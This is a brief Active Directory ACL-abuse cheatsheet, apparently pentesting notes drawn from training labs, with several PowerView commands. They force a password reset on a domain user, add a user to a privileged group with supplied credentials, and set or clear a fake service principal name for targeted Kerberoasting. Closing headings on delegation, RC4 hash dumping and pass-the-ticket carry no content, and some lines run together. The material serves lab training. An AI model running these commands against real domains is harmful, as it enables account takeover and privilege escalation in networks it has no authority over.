Abuse some ACL
Just another cheatsheet
ForceChangePassword
Import .\Power-View.ps1
Set-DomainUserPassword -Domain painters.htb -Identity blake -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -VerboseGenericWrite
Add user to group
$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred -VerboseAdd fake SPN
Set-DomainObject -Credential $Cred -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -VerboseRemove SPN
Set-DomainObject -Credential $Cred -Identity adunn -Clear serviceprincipalname -VerboseAllowedToDelegate

Check msds bằng Powerview
Dump RC4 từ cleartext password
Pass the ticket
Last updated